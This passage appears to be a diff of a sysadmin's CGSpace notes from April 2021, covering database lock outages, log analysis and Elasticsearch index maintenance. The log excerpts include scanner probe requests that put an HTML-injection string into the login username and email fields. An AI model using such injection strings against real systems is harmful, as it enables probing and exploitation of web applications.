                                                                                                                                                                                                                                                                +/home/cgspace.cgiar.org/log/dspace.log.2021-04-02:
                                                                                                                                                                                                                                                                +14315
                                                                                                                                                                                                                                                                +/home/cgspace.cgiar.org/log/dspace.log.2021-04-03:
                                                                                                                                                                                                                                                                +12530
                                                                                                                                                                                                                                                                +/home/cgspace.cgiar.org/log/dspace.log.2021-04-04:
                                                                                                                                                                                                                                                                +13138
                                                                                                                                                                                                                                                                +/home/cgspace.cgiar.org/log/dspace.log.2021-04-05:
                                                                                                                                                                                                                                                                +16756
                                                                                                                                                                                                                                                                +/home/cgspace.cgiar.org/log/dspace.log.2021-04-06:
                                                                                                                                                                                                                                                                +12343
                                                                                                                                                                                                                                                                +
                                                                                                                                                                                                                                                                • So it’s not the number of sessions… it’s something with the workload…
                                                                                                                                                                                                                                                                • I had to step away for an hour or so and when I came back the site was still down and there were still 12,000 locks
                                                                                                                                                                                                                                                                    @@ -421,13 +421,13 @@ $ psql -c 'SELECT * FROM pg_locks pl LEFT JOIN p
                                                                                                                                                                                                                                                                  • The locks in PostgreSQL shot up again…
                                                                                                                                                                                                                                                                  -
                                                                                                                                                                                                                                                                  $ psql -c 'SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;' | wc -l
                                                                                                                                                                                                                                                                  -3447
                                                                                                                                                                                                                                                                  -$ psql -c 'SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;' | wc -l
                                                                                                                                                                                                                                                                  -3527
                                                                                                                                                                                                                                                                  -$ psql -c 'SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;' | wc -l
                                                                                                                                                                                                                                                                  -4582
                                                                                                                                                                                                                                                                  -
                                                                                                                                                                                                                                                                    +
                                                                                                                                                                                                                                                                    $ psql -c 'SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;' | wc -l
                                                                                                                                                                                                                                                                    +3447
                                                                                                                                                                                                                                                                    +$ psql -c 'SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;' | wc -l
                                                                                                                                                                                                                                                                    +3527
                                                                                                                                                                                                                                                                    +$ psql -c 'SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;' | wc -l
                                                                                                                                                                                                                                                                    +4582
                                                                                                                                                                                                                                                                    +
                                                                                                                                                                                                                                                                    • I don’t know what the hell is going on, but the PostgreSQL connections and locks are way higher than ever before:

                                                                                                                                                                                                                                                                    PostgreSQL connections week @@ -440,9 +440,9 @@ $ psql -c 'SELECT * FROM pg_locks pl LEFT JOIN p

                                                                                                                                                                                                                                                                    • While looking at the nginx logs I see that MEL is trying to log into CGSpace’s REST API and delete items:
                                                                                                                                                                                                                                                                    -
                                                                                                                                                                                                                                                                    34.209.213.122 - - [06/Apr/2021:03:50:46 +0200] "POST /rest/login HTTP/1.1" 401 727 "-" "MEL"
                                                                                                                                                                                                                                                                    -34.209.213.122 - - [06/Apr/2021:03:50:48 +0200] "DELETE /rest/items/95f52bf1-f082-4e10-ad57-268a76ca18ec/metadata HTTP/1.1" 401 704 "-" "-"
                                                                                                                                                                                                                                                                    -
                                                                                                                                                                                                                                                                      +
                                                                                                                                                                                                                                                                      34.209.213.122 - - [06/Apr/2021:03:50:46 +0200] "POST /rest/login HTTP/1.1" 401 727 "-" "MEL"
                                                                                                                                                                                                                                                                      +34.209.213.122 - - [06/Apr/2021:03:50:48 +0200] "DELETE /rest/items/95f52bf1-f082-4e10-ad57-268a76ca18ec/metadata HTTP/1.1" 401 704 "-" "-"
                                                                                                                                                                                                                                                                      +
                                                                                                                                                                                                                                                                      • I see a few of these per day going back several months
                                                                                                                                                                                                                                                                        • I sent a message to Salem and Enrico to ask if they know
                                                                                                                                                                                                                                                                        • @@ -450,13 +450,13 @@ $ psql -c 'SELECT * FROM pg_locks pl LEFT JOIN p
                                                                                                                                                                                                                                                                        • Also annoying, I see tons of what look like penetration testing requests from Qualys:
                                                                                                                                                                                                                                                                        -
                                                                                                                                                                                                                                                                        2021-04-04 06:35:17,889 INFO  org.dspace.authenticate.LDAPAuthentication @ anonymous:session_id=FF1E051BCA7D81CC5A807D85380D81E5:ip_addr=64.39.108.48:failed_login:no DN found for user "'><qss a=X158062356Y1_2Z>
                                                                                                                                                                                                                                                                        -2021-04-04 06:35:17,889 INFO  org.dspace.authenticate.PasswordAuthentication @ anonymous:session_id=FF1E051BCA7D81CC5A807D85380D81E5:ip_addr=64.39.108.48:authenticate:attempting password auth of user="'><qss a=X158062356Y1_2Z>
                                                                                                                                                                                                                                                                        -2021-04-04 06:35:17,890 INFO  org.dspace.app.xmlui.utils.AuthenticationUtil @ anonymous:session_id=FF1E051BCA7D81CC5A807D85380D81E5:ip_addr=64.39.108.48:failed_login:email="'><qss a=X158062356Y1_2Z>, realm=null, result=2
                                                                                                                                                                                                                                                                        -2021-04-04 06:35:18,145 INFO  org.dspace.authenticate.LDAPAuthentication @ anonymous:session_id=FF1E051BCA7D81CC5A807D85380D81E5:ip_addr=64.39.108.48:auth:attempting trivial auth of user=was@qualys.com
                                                                                                                                                                                                                                                                        -2021-04-04 06:35:18,519 INFO  org.dspace.authenticate.LDAPAuthentication @ anonymous:session_id=FF1E051BCA7D81CC5A807D85380D81E5:ip_addr=64.39.108.48:failed_login:no DN found for user was@qualys.com
                                                                                                                                                                                                                                                                        -2021-04-04 06:35:18,520 INFO  org.dspace.authenticate.PasswordAuthentication @ anonymous:session_id=FF1E051BCA7D81CC5A807D85380D81E5:ip_addr=64.39.108.48:authenticate:attempting password auth of user=was@qualys.com
                                                                                                                                                                                                                                                                        -
                                                                                                                                                                                                                                                                          +
                                                                                                                                                                                                                                                                          2021-04-04 06:35:17,889 INFO  org.dspace.authenticate.LDAPAuthentication @ anonymous:session_id=FF1E051BCA7D81CC5A807D85380D81E5:ip_addr=64.39.108.48:failed_login:no DN found for user "'><qss a=X158062356Y1_2Z>
                                                                                                                                                                                                                                                                          +2021-04-04 06:35:17,889 INFO  org.dspace.authenticate.PasswordAuthentication @ anonymous:session_id=FF1E051BCA7D81CC5A807D85380D81E5:ip_addr=64.39.108.48:authenticate:attempting password auth of user="'><qss a=X158062356Y1_2Z>
                                                                                                                                                                                                                                                                          +2021-04-04 06:35:17,890 INFO  org.dspace.app.xmlui.utils.AuthenticationUtil @ anonymous:session_id=FF1E051BCA7D81CC5A807D85380D81E5:ip_addr=64.39.108.48:failed_login:email="'><qss a=X158062356Y1_2Z>, realm=null, result=2
                                                                                                                                                                                                                                                                          +2021-04-04 06:35:18,145 INFO  org.dspace.authenticate.LDAPAuthentication @ anonymous:session_id=FF1E051BCA7D81CC5A807D85380D81E5:ip_addr=64.39.108.48:auth:attempting trivial auth of user=was@qualys.com
                                                                                                                                                                                                                                                                          +2021-04-04 06:35:18,519 INFO  org.dspace.authenticate.LDAPAuthentication @ anonymous:session_id=FF1E051BCA7D81CC5A807D85380D81E5:ip_addr=64.39.108.48:failed_login:no DN found for user was@qualys.com
                                                                                                                                                                                                                                                                          +2021-04-04 06:35:18,520 INFO  org.dspace.authenticate.PasswordAuthentication @ anonymous:session_id=FF1E051BCA7D81CC5A807D85380D81E5:ip_addr=64.39.108.48:authenticate:attempting password auth of user=was@qualys.com
                                                                                                                                                                                                                                                                          +
                                                                                                                                                                                                                                                                          • I deleted the ilri/AReS repository on GitHub since we haven’t updated it in two years
                                                                                                                                                                                                                                                                            • All development is happening in https://github.com/ilri/openRXV now
                                                                                                                                                                                                                                                                            • @@ -464,38 +464,38 @@ $ psql -c 'SELECT * FROM pg_locks pl LEFT JOIN p
                                                                                                                                                                                                                                                                            • 10PM and the server is down again, with locks through the roof:
                                                                                                                                                                                                                                                                            -
                                                                                                                                                                                                                                                                            $ psql -c 'SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;' | wc -l
                                                                                                                                                                                                                                                                            -12198
                                                                                                                                                                                                                                                                            -
                                                                                                                                                                                                                                                                              +
                                                                                                                                                                                                                                                                              $ psql -c 'SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;' | wc -l
                                                                                                                                                                                                                                                                              +12198
                                                                                                                                                                                                                                                                              +
                                                                                                                                                                                                                                                                              • I see that there are tons of PostgreSQL connections getting abandoned today, compared to very few in the past few weeks:
                                                                                                                                                                                                                                                                              -
                                                                                                                                                                                                                                                                              $ journalctl -u tomcat7 --since=today | grep -c 'ConnectionPool abandon'
                                                                                                                                                                                                                                                                              -1838
                                                                                                                                                                                                                                                                              -$ journalctl -u tomcat7 --since=2021-03-20 --until=2021-04-05 | grep -c 'ConnectionPool abandon'
                                                                                                                                                                                                                                                                              -3
                                                                                                                                                                                                                                                                              -
                                                                                                                                                                                                                                                                                +
                                                                                                                                                                                                                                                                                $ journalctl -u tomcat7 --since=today | grep -c 'ConnectionPool abandon'
                                                                                                                                                                                                                                                                                +1838
                                                                                                                                                                                                                                                                                +$ journalctl -u tomcat7 --since=2021-03-20 --until=2021-04-05 | grep -c 'ConnectionPool abandon'
                                                                                                                                                                                                                                                                                +3
                                                                                                                                                                                                                                                                                +
                                                                                                                                                                                                                                                                                • I even restarted the server and connections were low for a few minutes until they shot back up:
                                                                                                                                                                                                                                                                                -
                                                                                                                                                                                                                                                                                $ psql -c 'SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;' | wc -l
                                                                                                                                                                                                                                                                                -13
                                                                                                                                                                                                                                                                                -$ psql -c 'SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;' | wc -l
                                                                                                                                                                                                                                                                                -8651
                                                                                                                                                                                                                                                                                -$ psql -c 'SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;' | wc -l
                                                                                                                                                                                                                                                                                -8940
                                                                                                                                                                                                                                                                                -$ psql -c 'SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;' | wc -l
                                                                                                                                                                                                                                                                                -10504
                                                                                                                                                                                                                                                                                -
                                                                                                                                                                                                                                                                                  +
                                                                                                                                                                                                                                                                                  $ psql -c 'SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;' | wc -l
                                                                                                                                                                                                                                                                                  +13
                                                                                                                                                                                                                                                                                  +$ psql -c 'SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;' | wc -l
                                                                                                                                                                                                                                                                                  +8651
                                                                                                                                                                                                                                                                                  +$ psql -c 'SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;' | wc -l
                                                                                                                                                                                                                                                                                  +8940
                                                                                                                                                                                                                                                                                  +$ psql -c 'SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;' | wc -l
                                                                                                                                                                                                                                                                                  +10504
                                                                                                                                                                                                                                                                                  +
                                                                                                                                                                                                                                                                                  • I had to go to bed and I bet it will crash and be down for hours until I wake up…
                                                                                                                                                                                                                                                                                  • What the hell is this user agent?
                                                                                                                                                                                                                                                                                  -
                                                                                                                                                                                                                                                                                  54.197.119.143 - - [06/Apr/2021:19:18:11 +0200] "GET /handle/10568/16499 HTTP/1.1" 499 0 "-" "GetUrl/1.0 wdestiny@umich.edu (Linux)"
                                                                                                                                                                                                                                                                                  +
                                                                                                                                                                                                                                                                                  54.197.119.143 - - [06/Apr/2021:19:18:11 +0200] "GET /handle/10568/16499 HTTP/1.1" 499 0 "-" "GetUrl/1.0 wdestiny@umich.edu (Linux)"
                                                                                                                                                                                                                                                                                   

                                                                                                                                                                                                                                                                                  2021-04-07

                                                                                                                                                                                                                                                                                  • CGSpace was still down from last night of course, with tons of database locks:
                                                                                                                                                                                                                                                                                  -
                                                                                                                                                                                                                                                                                  $ psql -c 'SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;' | wc -l
                                                                                                                                                                                                                                                                                  -12168
                                                                                                                                                                                                                                                                                  -
                                                                                                                                                                                                                                                                                    +
                                                                                                                                                                                                                                                                                    $ psql -c 'SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;' | wc -l
                                                                                                                                                                                                                                                                                    +12168
                                                                                                                                                                                                                                                                                    +
                                                                                                                                                                                                                                                                                    • I restarted the server again and the locks came back
                                                                                                                                                                                                                                                                                    • Atmire responded to the message from yesterday
                                                                                                                                                                                                                                                                                        @@ -504,8 +504,8 @@ $ psql -c 'SELECT * FROM pg_locks pl LEFT JOIN p
                                                                                                                                                                                                                                                                                    -
                                                                                                                                                                                                                                                                                    2021-04-01 12:45:11,414 WARN  org.dspace.workflowbasic.BasicWorkflowServiceImpl @ a.akwarandu@cgiar.org:session_id=2F20F20D4A8C36DB53D42DE45DFA3CCE:notifyGroupofTask:cannot email user group_id=aecf811b-b7e9-4b6f-8776-3d372e6a048b workflow_item_id=33085\colon;  Invalid Addresses (com.sun.mail.smtp.SMTPAddressFailedException\colon; 501 5.1.3 Invalid address
                                                                                                                                                                                                                                                                                    -
                                                                                                                                                                                                                                                                                      +
                                                                                                                                                                                                                                                                                      2021-04-01 12:45:11,414 WARN  org.dspace.workflowbasic.BasicWorkflowServiceImpl @ a.akwarandu@cgiar.org:session_id=2F20F20D4A8C36DB53D42DE45DFA3CCE:notifyGroupofTask:cannot email user group_id=aecf811b-b7e9-4b6f-8776-3d372e6a048b workflow_item_id=33085\colon;  Invalid Addresses (com.sun.mail.smtp.SMTPAddressFailedException\colon; 501 5.1.3 Invalid address
                                                                                                                                                                                                                                                                                      +
                                                                                                                                                                                                                                                                                      • The issue is not the named user above, but a member of the group…
                                                                                                                                                                                                                                                                                      • And the group does have users with invalid email addresses (probably accounts created automatically after authenticating with LDAP):
                                                                                                                                                                                                                                                                                      @@ -513,51 +513,51 @@ $ psql -c 'SELECT * FROM pg_locks pl LEFT JOIN p
                                                                                                                                                                                                                                                                                      • I extracted all the group IDs from recent logs that had users with invalid email addresses:
                                                                                                                                                                                                                                                                                      -
                                                                                                                                                                                                                                                                                      $ grep -a -E 'email user group_id=\b[0-9a-f]{8}\b-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-\b[0-9a-f]{12}\b' /home/cgspace.cgiar.org/log/dspace.log.* | grep -o -E '\b[0-9a-f]{8}\b-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-\b[0-9a-f]{12}\b' | sort | uniq
                                                                                                                                                                                                                                                                                      -0a30d6ae-74a6-4eee-a8f5-ee5d15192ee6
                                                                                                                                                                                                                                                                                      -1769137c-36d4-42b2-8fec-60585e110db7
                                                                                                                                                                                                                                                                                      -203c8614-8a97-4ac8-9686-d9d62cb52acc
                                                                                                                                                                                                                                                                                      -294603de-3d09-464e-a5b0-09e452c6b5ab
                                                                                                                                                                                                                                                                                      -35878555-9623-4679-beb8-bb3395fdf26e
                                                                                                                                                                                                                                                                                      -3d8a5efa-5509-4bf9-9374-2bc714aceb99
                                                                                                                                                                                                                                                                                      -4238208a-f848-47cb-9dd2-43f9f954a4af
                                                                                                                                                                                                                                                                                      -44939b84-1894-41e7-b3e6-8c8d1781057b
                                                                                                                                                                                                                                                                                      -49ba087e-75a3-45ce-805c-69eeda0f786b
                                                                                                                                                                                                                                                                                      -4a6606ce-0284-421d-bf80-4dafddba2d42
                                                                                                                                                                                                                                                                                      -527de6aa-9cd0-4988-bf5f-c9c92ba2ac10
                                                                                                                                                                                                                                                                                      -54cd1b16-65bf-4041-9d84-fb2ea3301d6d
                                                                                                                                                                                                                                                                                      -58982847-5f7c-4b8b-a7b0-4d4de702136e
                                                                                                                                                                                                                                                                                      -5f0b85be-bd23-47de-927d-bca368fa1fbc
                                                                                                                                                                                                                                                                                      -646ada17-e4ef-49f6-9378-af7e58596ce1
                                                                                                                                                                                                                                                                                      -7e2f4bf8-fbc9-4b2f-97a4-75e5427bef90
                                                                                                                                                                                                                                                                                      -8029fd53-f9f5-4107-bfc3-8815507265cf
                                                                                                                                                                                                                                                                                      -81faa934-c602-4608-bf45-de91845dfea7
                                                                                                                                                                                                                                                                                      -8611a462-210c-4be1-a5bb-f87a065e6113
                                                                                                                                                                                                                                                                                      -8855c903-ef86-433c-b0be-c12300eb0f84
                                                                                                                                                                                                                                                                                      -8c7ece98-3598-4de7-a885-d61fd033bea8
                                                                                                                                                                                                                                                                                      -8c9a0d01-2d12-4a99-84f9-cdc25ac072f9
                                                                                                                                                                                                                                                                                      -8f9f888a-b501-41f3-a462-4da16150eebf
                                                                                                                                                                                                                                                                                      -94168f0e-9f45-4112-ac8d-3ba9be917842
                                                                                                                                                                                                                                                                                      -96998038-f381-47dc-8488-ff7252703627
                                                                                                                                                                                                                                                                                      -9768f4a8-3018-44e9-bf58-beba4296327c
                                                                                                                                                                                                                                                                                      -9a99e8d2-558e-4fc1-8011-e4411f658414
                                                                                                                                                                                                                                                                                      -a34e6400-78ed-45c0-a751-abc039eed2e6
                                                                                                                                                                                                                                                                                      -a9da5af3-4ec7-4a9b-becb-6e3d028d594d
                                                                                                                                                                                                                                                                                      -abf5201c-8be5-4dee-b461-132203dd51cb
                                                                                                                                                                                                                                                                                      -adb5658c-cef3-402f-87b6-b498f580351c
                                                                                                                                                                                                                                                                                      -aecf811b-b7e9-4b6f-8776-3d372e6a048b
                                                                                                                                                                                                                                                                                      -ba5aae61-ea34-4ac1-9490-4645acf2382f
                                                                                                                                                                                                                                                                                      -bf7f3638-c7c6-4a8f-893d-891a6d3dafff
                                                                                                                                                                                                                                                                                      -c617ada0-09d1-40ed-b479-1c4860a4f724
                                                                                                                                                                                                                                                                                      -cff91d44-a855-458c-89e5-bd48c17d1a54
                                                                                                                                                                                                                                                                                      -e65171ae-a2bf-4043-8f54-f8457bc9174b
                                                                                                                                                                                                                                                                                      -e7098b40-4701-4ca2-b9a9-3a1282f67044
                                                                                                                                                                                                                                                                                      -e904f122-71dc-439b-b877-313ef62486d7
                                                                                                                                                                                                                                                                                      -ede59734-adac-4c01-8691-b45f19088d37
                                                                                                                                                                                                                                                                                      -f88bd6bb-f93f-41cb-872f-ff26f6237068
                                                                                                                                                                                                                                                                                      -f985f5fb-be5c-430b-a8f1-cf86ae4fc49a
                                                                                                                                                                                                                                                                                      -fe800006-aaec-4f9e-9ab4-f9475b4cbdc3
                                                                                                                                                                                                                                                                                      -

                                                                                                                                                                                                                                                                                      2021-04-08

                                                                                                                                                                                                                                                                                      +
                                                                                                                                                                                                                                                                                      $ grep -a -E 'email user group_id=\b[0-9a-f]{8}\b-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-\b[0-9a-f]{12}\b' /home/cgspace.cgiar.org/log/dspace.log.* | grep -o -E '\b[0-9a-f]{8}\b-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-\b[0-9a-f]{12}\b' | sort | uniq
                                                                                                                                                                                                                                                                                      +0a30d6ae-74a6-4eee-a8f5-ee5d15192ee6
                                                                                                                                                                                                                                                                                      +1769137c-36d4-42b2-8fec-60585e110db7
                                                                                                                                                                                                                                                                                      +203c8614-8a97-4ac8-9686-d9d62cb52acc
                                                                                                                                                                                                                                                                                      +294603de-3d09-464e-a5b0-09e452c6b5ab
                                                                                                                                                                                                                                                                                      +35878555-9623-4679-beb8-bb3395fdf26e
                                                                                                                                                                                                                                                                                      +3d8a5efa-5509-4bf9-9374-2bc714aceb99
                                                                                                                                                                                                                                                                                      +4238208a-f848-47cb-9dd2-43f9f954a4af
                                                                                                                                                                                                                                                                                      +44939b84-1894-41e7-b3e6-8c8d1781057b
                                                                                                                                                                                                                                                                                      +49ba087e-75a3-45ce-805c-69eeda0f786b
                                                                                                                                                                                                                                                                                      +4a6606ce-0284-421d-bf80-4dafddba2d42
                                                                                                                                                                                                                                                                                      +527de6aa-9cd0-4988-bf5f-c9c92ba2ac10
                                                                                                                                                                                                                                                                                      +54cd1b16-65bf-4041-9d84-fb2ea3301d6d
                                                                                                                                                                                                                                                                                      +58982847-5f7c-4b8b-a7b0-4d4de702136e
                                                                                                                                                                                                                                                                                      +5f0b85be-bd23-47de-927d-bca368fa1fbc
                                                                                                                                                                                                                                                                                      +646ada17-e4ef-49f6-9378-af7e58596ce1
                                                                                                                                                                                                                                                                                      +7e2f4bf8-fbc9-4b2f-97a4-75e5427bef90
                                                                                                                                                                                                                                                                                      +8029fd53-f9f5-4107-bfc3-8815507265cf
                                                                                                                                                                                                                                                                                      +81faa934-c602-4608-bf45-de91845dfea7
                                                                                                                                                                                                                                                                                      +8611a462-210c-4be1-a5bb-f87a065e6113
                                                                                                                                                                                                                                                                                      +8855c903-ef86-433c-b0be-c12300eb0f84
                                                                                                                                                                                                                                                                                      +8c7ece98-3598-4de7-a885-d61fd033bea8
                                                                                                                                                                                                                                                                                      +8c9a0d01-2d12-4a99-84f9-cdc25ac072f9
                                                                                                                                                                                                                                                                                      +8f9f888a-b501-41f3-a462-4da16150eebf
                                                                                                                                                                                                                                                                                      +94168f0e-9f45-4112-ac8d-3ba9be917842
                                                                                                                                                                                                                                                                                      +96998038-f381-47dc-8488-ff7252703627
                                                                                                                                                                                                                                                                                      +9768f4a8-3018-44e9-bf58-beba4296327c
                                                                                                                                                                                                                                                                                      +9a99e8d2-558e-4fc1-8011-e4411f658414
                                                                                                                                                                                                                                                                                      +a34e6400-78ed-45c0-a751-abc039eed2e6
                                                                                                                                                                                                                                                                                      +a9da5af3-4ec7-4a9b-becb-6e3d028d594d
                                                                                                                                                                                                                                                                                      +abf5201c-8be5-4dee-b461-132203dd51cb
                                                                                                                                                                                                                                                                                      +adb5658c-cef3-402f-87b6-b498f580351c
                                                                                                                                                                                                                                                                                      +aecf811b-b7e9-4b6f-8776-3d372e6a048b
                                                                                                                                                                                                                                                                                      +ba5aae61-ea34-4ac1-9490-4645acf2382f
                                                                                                                                                                                                                                                                                      +bf7f3638-c7c6-4a8f-893d-891a6d3dafff
                                                                                                                                                                                                                                                                                      +c617ada0-09d1-40ed-b479-1c4860a4f724
                                                                                                                                                                                                                                                                                      +cff91d44-a855-458c-89e5-bd48c17d1a54
                                                                                                                                                                                                                                                                                      +e65171ae-a2bf-4043-8f54-f8457bc9174b
                                                                                                                                                                                                                                                                                      +e7098b40-4701-4ca2-b9a9-3a1282f67044
                                                                                                                                                                                                                                                                                      +e904f122-71dc-439b-b877-313ef62486d7
                                                                                                                                                                                                                                                                                      +ede59734-adac-4c01-8691-b45f19088d37
                                                                                                                                                                                                                                                                                      +f88bd6bb-f93f-41cb-872f-ff26f6237068
                                                                                                                                                                                                                                                                                      +f985f5fb-be5c-430b-a8f1-cf86ae4fc49a
                                                                                                                                                                                                                                                                                      +fe800006-aaec-4f9e-9ab4-f9475b4cbdc3
                                                                                                                                                                                                                                                                                      +

                                                                                                                                                                                                                                                                                      2021-04-08

                                                                                                                                                                                                                                                                                      • I can’t believe it but the server has been down for twelve hours or so
                                                                                                                                                                                                                                                                                          @@ -565,26 +565,26 @@ fe800006-aaec-4f9e-9ab4-f9475b4cbdc3
                                                                                                                                                                                                                                                                                      -
                                                                                                                                                                                                                                                                                      $ psql -c 'SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;' | wc -l
                                                                                                                                                                                                                                                                                      -12070
                                                                                                                                                                                                                                                                                      -
                                                                                                                                                                                                                                                                                        +
                                                                                                                                                                                                                                                                                        $ psql -c 'SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;' | wc -l
                                                                                                                                                                                                                                                                                        +12070
                                                                                                                                                                                                                                                                                        +
                                                                                                                                                                                                                                                                                        • I restarted PostgreSQL and Tomcat and the locks go straight back up!
                                                                                                                                                                                                                                                                                        -
                                                                                                                                                                                                                                                                                        $ psql -c 'SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;' | wc -l
                                                                                                                                                                                                                                                                                        -13
                                                                                                                                                                                                                                                                                        -$ psql -c 'SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;' | wc -l
                                                                                                                                                                                                                                                                                        -986
                                                                                                                                                                                                                                                                                        -$ psql -c 'SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;' | wc -l
                                                                                                                                                                                                                                                                                        -1194
                                                                                                                                                                                                                                                                                        -$ psql -c 'SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;' | wc -l
                                                                                                                                                                                                                                                                                        -1212
                                                                                                                                                                                                                                                                                        -$ psql -c 'SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;' | wc -l
                                                                                                                                                                                                                                                                                        -1489
                                                                                                                                                                                                                                                                                        -$ psql -c 'SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;' | wc -l
                                                                                                                                                                                                                                                                                        -2124
                                                                                                                                                                                                                                                                                        -$ psql -c 'SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;' | wc -l
                                                                                                                                                                                                                                                                                        -5934
                                                                                                                                                                                                                                                                                        -

                                                                                                                                                                                                                                                                                        2021-04-09

                                                                                                                                                                                                                                                                                        +
                                                                                                                                                                                                                                                                                        $ psql -c 'SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;' | wc -l
                                                                                                                                                                                                                                                                                        +13
                                                                                                                                                                                                                                                                                        +$ psql -c 'SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;' | wc -l
                                                                                                                                                                                                                                                                                        +986
                                                                                                                                                                                                                                                                                        +$ psql -c 'SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;' | wc -l
                                                                                                                                                                                                                                                                                        +1194
                                                                                                                                                                                                                                                                                        +$ psql -c 'SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;' | wc -l
                                                                                                                                                                                                                                                                                        +1212
                                                                                                                                                                                                                                                                                        +$ psql -c 'SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;' | wc -l
                                                                                                                                                                                                                                                                                        +1489
                                                                                                                                                                                                                                                                                        +$ psql -c 'SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;' | wc -l
                                                                                                                                                                                                                                                                                        +2124
                                                                                                                                                                                                                                                                                        +$ psql -c 'SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;' | wc -l
                                                                                                                                                                                                                                                                                        +5934
                                                                                                                                                                                                                                                                                        +

                                                                                                                                                                                                                                                                                        2021-04-09

                                                                                                                                                                                                                                                                                        • Atmire managed to get CGSpace back up by killing all the PostgreSQL connections yesterday
                                                                                                                                                                                                                                                                                            @@ -608,46 +608,46 @@ $ psql -c 'SELECT * FROM pg_locks pl LEFT JOIN p
                                                                                                                                                                                                                                                                                        -
                                                                                                                                                                                                                                                                                        $ curl -X PUT "localhost:9200/openrxv-items/_settings" -H 'Content-Type: application/json' -d'{"settings": {"index.blocks.write": true}}'
                                                                                                                                                                                                                                                                                        -$ curl -s -X POST http://localhost:9200/openrxv-items-temp/_clone/openrxv-items-backup
                                                                                                                                                                                                                                                                                        -$ curl -X PUT "localhost:9200/openrxv-items/_settings" -H 'Content-Type: application/json' -d'{"settings": {"index.blocks.write": false}}'
                                                                                                                                                                                                                                                                                        -$ curl -XDELETE 'http://localhost:9200/openrxv-items-temp'
                                                                                                                                                                                                                                                                                        -$ curl -XDELETE 'http://localhost:9200/openrxv-items-final'
                                                                                                                                                                                                                                                                                        -
                                                                                                                                                                                                                                                                                          +
                                                                                                                                                                                                                                                                                          $ curl -X PUT "localhost:9200/openrxv-items/_settings" -H 'Content-Type: application/json' -d'{"settings": {"index.blocks.write": true}}'
                                                                                                                                                                                                                                                                                          +$ curl -s -X POST http://localhost:9200/openrxv-items-temp/_clone/openrxv-items-backup
                                                                                                                                                                                                                                                                                          +$ curl -X PUT "localhost:9200/openrxv-items/_settings" -H 'Content-Type: application/json' -d'{"settings": {"index.blocks.write": false}}'
                                                                                                                                                                                                                                                                                          +$ curl -XDELETE 'http://localhost:9200/openrxv-items-temp'
                                                                                                                                                                                                                                                                                          +$ curl -XDELETE 'http://localhost:9200/openrxv-items-final'
                                                                                                                                                                                                                                                                                          +
                                                                                                                                                                                                                                                                                          • Then I updated all Docker containers and rebooted the server (linode20) so that the correct indexes would be created again:
                                                                                                                                                                                                                                                                                          -
                                                                                                                                                                                                                                                                                          $ docker images | grep -v ^REPO | sed 's/ \+/:/g' | cut -d: -f1,2 | xargs -L1 docker pull
                                                                                                                                                                                                                                                                                          -
                                                                                                                                                                                                                                                                                            +
                                                                                                                                                                                                                                                                                            $ docker images | grep -v ^REPO | sed 's/ \+/:/g' | cut -d: -f1,2 | xargs -L1 docker pull
                                                                                                                                                                                                                                                                                            +
                                                                                                                                                                                                                                                                                            • Then I realized I have to clone the backup index directly to openrxv-items-final, and re-create the openrxv-items alias:
                                                                                                                                                                                                                                                                                            -
                                                                                                                                                                                                                                                                                            $ curl -XDELETE 'http://localhost:9200/openrxv-items-final'
                                                                                                                                                                                                                                                                                            -$ curl -X PUT "localhost:9200/openrxv-items-backup/_settings" -H 'Content-Type: application/json' -d'{"settings": {"index.blocks.write": true}}'
